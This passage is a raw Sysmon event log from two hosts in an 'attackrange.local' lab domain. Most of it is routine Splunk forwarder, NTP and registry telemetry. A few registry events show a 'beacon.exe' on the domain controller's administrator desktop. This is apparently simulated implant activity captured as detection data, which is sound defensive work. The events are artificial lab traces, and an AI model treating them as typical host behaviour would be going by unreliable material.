12:17:38.200{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=680ADDF4F5267260115B6951185401B8,SHA256=F3192B53E955E989C701511E5229048A70EA09B903B58C9BD19A5B3DFCBC53F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345797Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:39.650{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345796Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:39.650{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE92A03809FDDA04A49DB86DDEA9FE0F,SHA256=CF3BC4665FFF881E06A81F9D3482EAE97A17995121E6A175D99A45ABC41FDF7Efalsetrue 354300x800000000000000021219688Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:25.669{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64328-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219687Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:39.200{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E81B3E35EC8C80E16517D005F1A6441E,SHA256=9DD4E2CFF3DF9DF5DBA04C0721699770F6439C0DE5CF6F990B328B89822A4132,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345795Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:39.251{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345794Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:39.251{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=787784FEFB9D8988379DB8A9E37D440D,SHA256=DEAEA43C8E10CB6FCD23145B492FD646E75567328A3F9C1ACD4F1CC87064CC67falsetrue 354300x800000000000000057345800Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.589{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54550-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345799Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:40.699{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345798Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:40.699{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=833EC401814FC40FEF55C9E046102941,SHA256=06D6C9188A6DE29CFDD1DBDEEAC746A48D3D2C72F4BB959800064E867AAC3970falsetrue 23542300x800000000000000021219689Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:40.215{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B007CF87069FFCE430A3E2ED7B722E8,SHA256=B9B9384612F03A8B34DDE65DFBF41F2630532E74FA530594943AB08714A3ADB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345802Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:41.718{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345801Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:41.718{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90A7B346996248493BF09B292A8BC11A,SHA256=148185CD0E3F5CCEC5836BC782E1E1C7EEBB20AABF150867C2B19F40F93820B1falsetrue 23542300x800000000000000021219690Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:41.247{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F433AFB2417FFC64888B3CC6C5646324,SHA256=7F3B1F248ECE45B5078021973D84F684D41393A4E260C1016A6B69B09B64FC10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345804Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:42.748{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345803Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:42.748{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C52C634639F7711D5BA1789E87D023DD,SHA256=E774E75BE00E3E3C245A933ACEC92696AFD8DDE6A34C90DB4671BF7CE9787408falsetrue 23542300x800000000000000021219692Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:42.294{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38E37C3ED8BC5EAB48FE0CCF28DEC80C,SHA256=39ADF59035C5B8BC11AFD2804DDD522F1CFC109168F29B2402F56D98BF47A4AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000021219691Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:17:42.122{AD5E2759-5433-6143-1300-00000000F101}308C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7d7bf-0x4a9ca010) 354300x800000000000000057345809Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:14.463{8B6011A9-886D-6164-1100-00000000F101}420C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-469.attackrange.local123ntpfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal123ntp 11241100x800000000000000057345808Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:43.763{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345807Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:43.763{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2412A24D63DD5BBE00A919F6EB8F2276,SHA256=5F5D0F85422E3E279A5683F372BAA63812BD1D559F890B8496EAF8FA9592C63Cfalsetrue 23542300x800000000000000021219694Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:43.325{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=513320FF7A7AFE4F8A4EE81550FC9F09,SHA256=537D5BA96E42A8CB3BE1A87356043035995B8EE639BBA8921F68BC783976B4D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345806Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:43.117{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345805Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:43.117{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CE8E5B35C07225F2231CE105E9B997B,SHA256=1B92394C93682D4762EAAE1A400F06EA4709FE65B6BDF2E6282469A6BB116160falsetrue 23542300x800000000000000021219693Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:43.184{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6803F073B108C45232FD5830FC3F400,SHA256=4B36EA9EAA53E81DF519E5F027A767FEBFE92091057B8E8E499B291A99FCF856,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345811Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:44.778{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345810Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:44.778{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18CB80821EC2F57193E6911A5E0F1C89,SHA256=2A87D4D17EECB9D150E54889BB1F640785CE7310429CDBDF42EA89707DAA1EC3falsetrue 354300x800000000000000021219697Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:30.527{AD5E2759-5433-6143-1300-00000000F101}308C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-874.attackrange.local123ntpfalse10.0.1.14ip-10-0-1-14.us-west-2.compute.internal123ntp 23542300x800000000000000021219696Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:44.325{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74768D3250989CC4A70A8E023D9EA50D,SHA256=3BE034D1CC775D929BB05143E060F17C2B4AF80A8B1E07118FF9A05A94D5975A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219695Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:44.262{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=449E4D9D81E270CEC5737EA33F01667F,SHA256=BE8E66054C6BE8FFF3094CEBA7FB4C4DE8BEA394038EF19BBB1D32C69EC5AECC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345815Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:45.797{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345814Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:45.797{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0305EF1CA75104E9ED293BA35B1BB312,SHA256=C07EE09D331925088E032A075A9D9F048FB236F4DE7158E5B6DA332DAB44785Bfalsetrue 354300x800000000000000021219699Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:31.668{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64329-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219698Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:45.325{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AE20B6128B51564B834511A53EAAC19,SHA256=6743951FBF6DE0CBE341B60A96B817B864E7A1F5C4B1A1E65E3D0A4CC814C750,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345813Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:45.146{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345812Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:45.146{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=245E74532944AD74E535FD24B8C78A5C,SHA256=2B364EF91FE99D3F6378A3B0C52B944E0EDDE73061629A76BB3BA710EE2F7CAEfalsetrue 11241100x800000000000000057345818Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:46.814{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345817Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:46.814{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19CB8A05F4B7923BB7803D733A200FE8,SHA256=D4E730CB7A34AE780CA63EEC4915D6B56DAD55F7211ABB2E103044F208A02EEAfalsetrue 23542300x800000000000000021219700Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:46.340{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=029477035C5486E1864BB3A096119743,SHA256=88526D1E1DD5D20A85003A80ABD73ADE7CC0D3B1CE56B76699F8369C6ECE99BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345816Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:16.469{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54551-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345820Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:47.829{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345819Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:47.829{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8981566287EFE081C5F4CCCE9C4DA75,SHA256=F6524A23C9CDBAE5B127017C3F7FCE4323E16820D85050CDF5D2A3EDC59B6B10falsetrue 23542300x800000000000000021219701Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:47.372{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=574E769A86A60F3C87E3503D46B3DF79,SHA256=5FEA440CFDDC993D1A3F6901EF27B20C1402CEAEFB4C652CB00FFD397291733D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057345826Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:17:48.944{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057345825Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:17:48.944{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x800000000000000057345824Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:48.860{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345823Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:48.860{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=007831FE341201E58E7BEC4FCBF3332D,SHA256=98D727A68A54F82BFB9EC10EA92388A4D63B7EC1A1A5B7AAF77AC62C64754157falsetrue 23542300x800000000000000021219702Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:48.375{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D1D348E1FD303FF903B9B06B07B3AEF,SHA256=C6AD66F8C8801FD98FD3539BB9BB87F6A243F13B9306FD9CE93B9A79C89E8EE3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345822Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:48.613{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345821Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:48.613{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAADE87B8F364A737F2A0C93967655CE,SHA256=39536312C92B685EEF35A1D388E4905DB75D874DEEF22436C6C693E653473ECAfalsetrue 11241100x800000000000000057345831Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:49.975{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345830Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:49.975{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1C525BA4FDAC128CDFC8CBB9840D1F5E,SHA256=FD871CBAECDC511D9A70ED70C5906B8365D82D5FF90189D2114A6076235DEDBAfalsetrue 11241100x800000000000000057345829Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:49.875{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345828Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:49.875{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71B21598B773448DDBB4D026B484122D,SHA256=BB363617FE9A5E6F90B1E766F4BF28914F8096506D0B5A5224E28868AA4D2871falsetrue 23542300x800000000000000021219703Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:49.391{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB473A9EA748BB04E7E4B728BCCF8403,SHA256=0A8D912FBBF2D1CD376BECAC2120679561C8996AC356C21BAC3136A7A9C0A72F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000057345827Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:17:49.013{8B6011A9-886D-6164-1100-00000000F101}420C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7d7bf-0x4eb82206) 11241100x800000000000000057345835Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:50.895{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345834Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:50.895{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2866B43D0200C083E0A318106115A5E,SHA256=ADFDE56CC2E7AD3A507F3B6CF43373D8A8C09C9A35CE8E07C98296018FAD635Efalsetrue 354300x800000000000000021219707Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:37.491{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64330-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219706Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:50.422{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=927096AD38E33135255B96AD79139067,SHA256=D2FE044D1DB7B3A039F04C75C624FAFBFD958F6EEB6115613E5FBE7D8D48906C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345833Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:21.528{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program 